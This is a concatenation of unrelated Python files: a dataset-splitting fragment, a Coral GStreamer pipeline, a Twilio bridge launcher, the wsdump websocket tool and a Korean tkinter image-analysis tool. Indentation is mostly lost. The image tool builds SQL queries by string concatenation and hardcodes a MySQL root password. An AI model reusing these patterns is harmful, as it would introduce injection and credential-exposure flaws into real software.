h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit('../coco128')
Arguments
path: Path to images directory
weights: Train, val, test weights (list)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in img_formats], []) # image files only
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
gstreamer.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modification by La Labomedia July 2021
import sys
import threading
import time
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstBase', '1.0')
gi.require_version('GstVideo', '1.0')
gi.require_version('Gtk', '3.0')
from gi.repository import GLib, GObject, Gst, GstBase, GstVideo, Gtk
Gst.init(None)
class GstPipeline:
def __init__(self, pipeline, inf_callback, render_callback, src_size):
self.inf_callback = inf_callback
self.render_callback = render_callback
self.running = False
self.gstbuffer = None
self.output = None
self.sink_size = None
self.src_size = src_size
self.box = None
self.condition = threading.Condition()
self.pipeline = Gst.parse_launch(pipeline)
self.freezer = self.pipeline.get_by_name('freezer')
self.overlay = self.pipeline.get_by_name('overlay')
self.overlaysink = self.pipeline.get_by_name('overlaysink')
appsink = self.pipeline.get_by_name('appsink')
appsink.connect('new-sample', self.on_new_sample)
# Set up a pipeline bus watch to catch errors.
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_bus_message)
# Set up a full screen window on Coral, no-op otherwise.
self.setup_window()
def run(self):
# Start inference worker.
self.running = True
inf_worker = threading.Thread(target=self.inference_loop)
inf_worker.start()
render_worker = threading.Thread(target=self.render_loop)
render_worker.start()
# Run pipeline.
self.pipeline.set_state(Gst.State.PLAYING)
self.pipeline.get_state(Gst.CLOCK_TIME_NONE)
# We're high latency on higher resolutions, don't drop our late frames.
if self.overlaysink:
sinkelement = self.overlaysink.get_by_interface(GstVideo.VideoOverlay)
else:
sinkelement = self.pipeline.get_by_interface(GstVideo.VideoOverlay)
sinkelement.set_property('sync', False)
sinkelement.set_property('qos', False)
try:
Gtk.main()
except:
pass
# Clean up.
self.pipeline.set_state(Gst.State.NULL)
while GLib.MainContext.default().iteration(False):
pass
with self.condition:
self.running = False
self.condition.notify_all()
inf_worker.join()
render_worker.join()
def on_bus_message(self, bus, message):
t = message.type
if t == Gst.MessageType.EOS:
Gtk.main_quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
Gtk.main_quit()
return True
def on_new_sample(self, sink):
sample = sink.emit('pull-sample')
if not self.sink_size:
s = sample.get_caps().get_structure(0)
self.sink_size = (s.get_value('width'), s.get_value('height'))
with self.condition:
self.gstbuffer = sample.get_buffer()
self.condition.notify_all()
return Gst.FlowReturn.OK
def get_box(self):
if not self.box:
glbox = self.pipeline.get_by_name('glbox')
if glbox:
glbox = glbox.get_by_name('filter')
box = self.pipeline.get_by_name('box')
assert glbox or box
assert self.sink_size
if glbox:
self.box = (glbox.get_property('x'), glbox.get_property('y'),
glbox.get_property('width'), glbox.get_property('height'))
else:
self.box = (-box.get_property('left'), -box.get_property('top'),
self.sink_size[0] + box.get_property('left') + box.get_property('right'),
self.sink_size[1] + box.get_property('top') + box.get_property('bottom'))
return self.box
def inference_loop(self):
while True:
with self.condition:
while not self.gstbuffer and self.running:
self.condition.wait()
if not self.running:
break
gstbuffer = self.gstbuffer
self.gstbuffer = None
# Input tensor is expected to be tightly packed, that is,
# width and stride in pixels are expected to be the same.
# For the Coral devboard using GPU this will always be true,
# but when using generic GStreamer CPU based elements the line
# stride will always be a multiple of 4 bytes in RGB format.
# In case of mismatch we have to copy the input line by line.
# For best performance input tensor size should take this
# into account when using CPU based elements.
# TODO: Use padded posenet models to avoid this.
meta = GstVideo.buffer_get_video_meta(gstbuffer)
assert meta and meta.n_planes == 1
bpp = 3 # bytes per pixel.
buf_stride = meta.stride[0] # 0 for first and only plane.
inf_stride = meta.width * bpp
if inf_stride == buf_stride:
# Fast case, pass buffer as input tensor as is.
input_tensor = gstbuffer
else:
# Slow case, need to pack lines tightly (copy).
result, mapinfo = gstbuffer.map(Gst.MapFlags.READ)
assert result
data_view = memoryview(mapinfo.data)
input_tensor = bytearray(inf_stride * meta.height)
src_offset = dst_offset = 0
for row in range(meta.height):
src_end = src_offset + inf_stride
dst_end = dst_offset + inf_stride
input_tensor[dst_offset : dst_end] = data_view[src_offset : src_end]
src_offset += buf_stride
dst_offset += inf_stride
input_tensor = bytes(input_tensor)
gstbuffer.unmap(mapinfo)
output = self.inf_callback(input_tensor)
with self.condition:
self.output = output
self.condition.notify_all()
def render_loop(self):
while True:
with self.condition:
while not self.output and self.running:
self.condition.wait()
if not self.running:
break
output = self.output
self.output = None
svg, freeze = self.render_callback(output, self.src_size, self.get_box())
self.freezer.frozen = freeze
if self.overlaysink:
self.overlaysink.set_property('svg', svg)
elif self.overlay:
self.overlay.set_property('data', svg)
def setup_window(self):
# Only set up our own window if we have Coral overlay sink in the pipeline.
if not self.overlaysink:
return
gi.require_version('GstGL', '1.0')
from gi.repository import GstGL
# Needed to commit the wayland sub-surface.
def on_gl_draw(sink, widget):
widget.queue_draw()
# Needed to account for window chrome etc.
def on_widget_configure(widget, event, overlaysink):
allocation = widget.get_allocation()
overlaysink.set_render_rectangle(allocation.x, allocation.y,
allocation.width, allocation.height)
return False
window = Gtk.Window(Gtk.WindowType.TOPLEVEL)
window.fullscreen()
drawing_area = Gtk.DrawingArea()
window.add(drawing_area)
drawing_area.realize()
self.overlaysink.connect('drawn', on_gl_draw, drawing_area)
# Wayland window handle.
wl_handle = self.overlaysink.get_wayland_window_handle(drawing_area)
self.overlaysink.set_window_handle(wl_handle)
# Wayland display context wrapped as a GStreamer context.
wl_display = self.overlaysink.get_default_wayland_display_context()
self.overlaysink.set_context(wl_display)
drawing_area.connect('configure-event', on_widget_configure, self.overlaysink)
window.connect('delete-event', Gtk.main_quit)
window.show_all()
# The appsink pipeline branch must use the same GL display as the screen
# rendering so they get the same GL context. This isn't automatically handled
# by GStreamer as we're the ones setting an external display handle.
def on_bus_message_sync(bus, message, overlaysink):
if message.type == Gst.MessageType.NEED_CONTEXT:
_, context_type = message.parse_context_type()
if context_type == GstGL.GL_DISPLAY_CONTEXT_TYPE:
sinkelement = overlaysink.get_by_interface(GstVideo.VideoOverlay)
gl_context = sinkelement.get_property('context')
if gl_context:
display_context = Gst.Context.new(GstGL.GL_DISPLAY_CONTEXT_TYPE, True)
GstGL.context_set_gl_display(display_context, gl_context.get_display())
message.src.set_context(display_context)
return Gst.BusSyncReply.PASS
bus = self.pipeline.get_bus()
bus.set_sync_handler(on_bus_message_sync, self.overlaysink)
def on_bus_message(bus, message, loop):
t = message.type
if t == Gst.MessageType.EOS:
loop.quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
loop.quit()
return True
def detectCoralDevBoard():
try:
if 'MX8MQ' in open('/sys/firmware/devicetree/base/model').read():
print('Detected Edge TPU dev board.')
return True
except:
pass
return False
class Freezer(GstBase.BaseTransform):
__gstmetadata__ = ('<longname>', '<class>', '<description>', '<author>')
__gsttemplates__ = (Gst.PadTemplate.new('sink',
Gst.PadDirection.SINK,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any()),
Gst.PadTemplate.new('src',
Gst.PadDirection.SRC,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any())
)
def __init__(self):
super().__init__() # chain up so the underlying GObject is properly initialized
self.buf = None
self.frozen = False
self.set_passthrough(False)
def do_prepare_output_buffer(self, inbuf):
if self.frozen:
if not self.buf:
self.buf = inbuf
src_buf = self.buf
else:
self.buf = None # drop any held frame so a later freeze captures the current one
src_buf = inbuf
buf = Gst.Buffer.new()
buf.copy_into(src_buf, Gst.BufferCopyFlags.FLAGS | Gst.BufferCopyFlags.TIMESTAMPS |
Gst.BufferCopyFlags.META | Gst.BufferCopyFlags.MEMORY, 0, inbuf.get_size())
buf.pts = inbuf.pts
return (Gst.FlowReturn.OK, buf)
def do_transform(self, inbuf, outbuf):
return Gst.FlowReturn.OK
def register_elements(plugin):
gtype = GObject.type_register(Freezer)
Gst.Element.register(plugin, 'freezer', 0, gtype)
return True
Gst.Plugin.register_static(
Gst.version()[0], Gst.version()[1], # GStreamer version
'', # name
'', # description
register_elements, # init_func
'', # version
'unknown', # license
'', # source
'', # package
'' # origin
)
def run_pipeline(inf_callback,
render_callback,
src_size,
inference_size,
mirror=False,
h264=False,
jpeg=False,
videosrc='/dev/video0'):
if h264:
SRC_CAPS = 'video/x-h264,width={width},height={height},framerate=30/1'
elif jpeg:
SRC_CAPS = 'image/jpeg,width={width},height={height},framerate=30/1'
else:
SRC_CAPS = 'video/x-raw,width={width},height={height},framerate=30/1'
PIPELINE = 'v4l2src device=%s ! {src_caps}'%videosrc
if detectCoralDevBoard():
scale_caps = None
PIPELINE += """ ! decodebin ! glupload ! glvideoflip video-direction={direction} ! tee name=t
t. ! {leaky_q} ! freezer name=freezer ! glsvgoverlaysink name=overlaysink
t. ! {leaky_q} ! glfilterbin filter=glbox name=glbox ! {sink_caps} ! {sink_element}
"""
else: # raspberry pi or linux
scale = min(inference_size[0] / src_size[0], inference_size[1] / src_size[1])
scale = tuple(int(x * scale) for x in src_size)
scale_caps = 'video/x-raw,width={width},height={height}'.format(width=scale[0], height=scale[1])
PIPELINE += """ ! decodebin ! videoflip video-direction={direction} ! tee name=t
t. ! {leaky_q} ! videoconvert ! freezer name=freezer ! rsvgoverlay name=overlay
! videoconvert ! autovideosink
t. ! {leaky_q} ! videoconvert ! videoscale ! {scale_caps} ! videobox name=box autocrop=true
! {sink_caps} ! {sink_element}
"""
SINK_ELEMENT = 'appsink name=appsink emit-signals=true max-buffers=1 drop=true'
SINK_CAPS = 'video/x-raw,format=RGB,width={width},height={height}'
LEAKY_Q = 'queue max-size-buffers=1 leaky=downstream'
direction = 'horiz' if mirror else 'identity'
src_caps = SRC_CAPS.format(width=src_size[0], height=src_size[1])
sink_caps = SINK_CAPS.format(width=inference_size[0], height=inference_size[1])
pipeline = PIPELINE.format(src_caps=src_caps, sink_caps=sink_caps,
sink_element=SINK_ELEMENT, direction=direction, leaky_q=LEAKY_Q, scale_caps=scale_caps)
print('Gstreamer pipeline: ', pipeline)
pipeline = GstPipeline(pipeline, inf_callback, render_callback, src_size)
pipeline.run()
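# Hedged usage sketch (not in the original source): run_pipeline expects an
# inference callback mapping a raw RGB buffer to a model output, and a render
# callback returning an (svg_markup, freeze_flag) pair. The callback names and
# sizes below are hypothetical.
if __name__ == '__main__':
    def demo_inference(input_tensor):
        return None  # a real app would run its model on input_tensor here
    def demo_render(output, src_size, box):
        return '<svg></svg>', False  # draw no overlay, never freeze the video
    run_pipeline(demo_inference, demo_render,
                 src_size=(640, 480), inference_size=(320, 240))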
|
main.py | from multiprocessing import Process, Pipe
from fb2twilio import run as runF2T
from twilio2fb import run as runT2F
if __name__ == '__main__':
Process(target=runF2T, args=()).start()
Process(target=runT2F, args=()).start()
print('Facetwilio active...') # parenthesized so it also runs under Python 3
|
wsdump.py | #!C:\Users\louis\Documents\GitHub\instagram_bot\tidl\Scripts\python.exe
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213': # gzip magic bytes
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
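# Example invocations (illustrative; the echo URL is the one from the --help text):
#   python wsdump.py ws://echo.websocket.org/          # interactive echo session
#   python wsdump.py wss://example.com/socket -v -t hi # verbose, send "hi" first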
|
tk_raw_analy_ver0.5.py |
## Image processing and data analysis tool
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
## Function definitions
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # check the file size
inH = inW = int(math.sqrt(fsize)) # determine the input buffer size (important!)
inImage = []; tmpList = []
for i in range(inH) : # allocate the input buffer (zero-initialized)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# load the data from file into memory
fp = open(fname, 'rb') # open the file (binary mode)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
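# Hedged helper (not in the original source): loadImage assumes a headerless,
# square, 8-bit grayscale .raw file, so a compatible test file can be produced
# with a sketch like this one (the file name and size are hypothetical).
def makeTestRaw(fname='test256.raw', size=256):
    with open(fname, 'wb') as fp:
        for i in range(size):
            for k in range(size):
                fp.write(bytes([(i + k) % 256]))  # simple diagonal gradient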
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# tear down the existing canvas, if any
if canvas != None :
canvas.destroy()
# prepare the window (fixed size)
window.geometry(str(outW) + 'x' + str(outH)) # Tk geometry strings are "widthxheight"
canvas = Canvas(window, width=outW, height=outH)
paper = PhotoImage(width=outW, height=outH)
canvas.create_image((outW/2, outH/2), image=paper, state='normal')
# draw to the screen
def putPixel() :
for i in range(0, outH) :
for k in range(0, outW) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data), (k,i))
threading.Thread(target=putPixel).start()
canvas.pack()
def equal() : # identity (copy) algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output buffer size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (zero-initialized)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
def addImage() : # brighten algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output buffer size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (zero-initialized)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
value = askinteger('Brighten', 'Amount to add -->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def a_average() : # average values of the input/output images
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # sub-window owned by the parent (window)
subWindow.geometry('200x100')
label1 = Label(subWindow, text='Input image average -->' + str(inRawAvg) ); label1.pack()
label2 = Label(subWindow, text='Output image average -->' + str(outRawAvg)); label2.pack()
subWindow.mainloop()
def upDown() : # vertical flip algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output buffer size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (zero-initialized)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[outH-1-i][k] = inImage[i][k] # flipping rows, so index with the height
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # record the pan start position
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # pan the image by the drag offset
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# important! determine the output buffer size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (zero-initialized)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # shrink (zoom out) algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output buffer size
scale = askinteger('Zoom out', 'Shrink factor -->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (zero-initialized)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outW):
for k in range(outH):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
import csv
def saveCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outH): # rows range over the height, columns over the width
for col in range(outW):
data = outImage[row][col]
row_list = [row, col, data]
csvWriter.writerow(row_list)
print('OK!')
def saveShuffleCSV() :
pass
def loadCSV(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = -1
fp = open(fname, 'r')
for f in fp :
fsize += 1
fp.close()
inH = inW = int(math.sqrt(fsize)) # determine the input buffer size (important!)
inImage = []; tmpList = []
for i in range(inH) : # allocate the input buffer (zero-initialized)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# load the data from file into memory
fp = open(fname, 'r') # open the file (text mode; it's a CSV)
csvFP = csv.reader(fp)
next(csvFP)
for row_list in csvFP :
row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
inImage[row][col] = value
fp.close()
def openCSV() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
loadCSV(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import sqlite3
def saveSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # open (or create) the database
cur = con.cursor() # create a cursor for executing queries
# build the column-name list
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
for i in range(inH) : # rows range over the height, columns over the width
for k in range(inW) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(inW) + \
"," + str(i) + "," + str(k) + "," + str(inImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok!')
def openSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # e.g. ['dog:128', 'dog:512', ...]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## Inner function: a local function defined inside another function #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # allocate the input buffer (zero-initialized)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openSQLite")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='Select', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openSQLite")
import pymysql
def saveMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # connect to the database
cur = con.cursor() # create a cursor for executing queries
# build the column-name list
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
try:
sql = "DELETE FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + str(outW)
cur.execute(sql)
con.commit()
except:
pass
for i in range(outH) : # this loop writes outImage, so range over the output size
for k in range(outW) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) + \
"," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok! saveMySQL')
def openMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # connect to the database
cur = con.cursor() # create a cursor for executing queries
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # e.g. ['dog:128', 'dog:512', ...]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## Inner function: a local function defined inside another function #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # allocate the input buffer (zero-initialized)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openMySQL")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='Select', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openMySQL")
## Global variables
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
## Main code
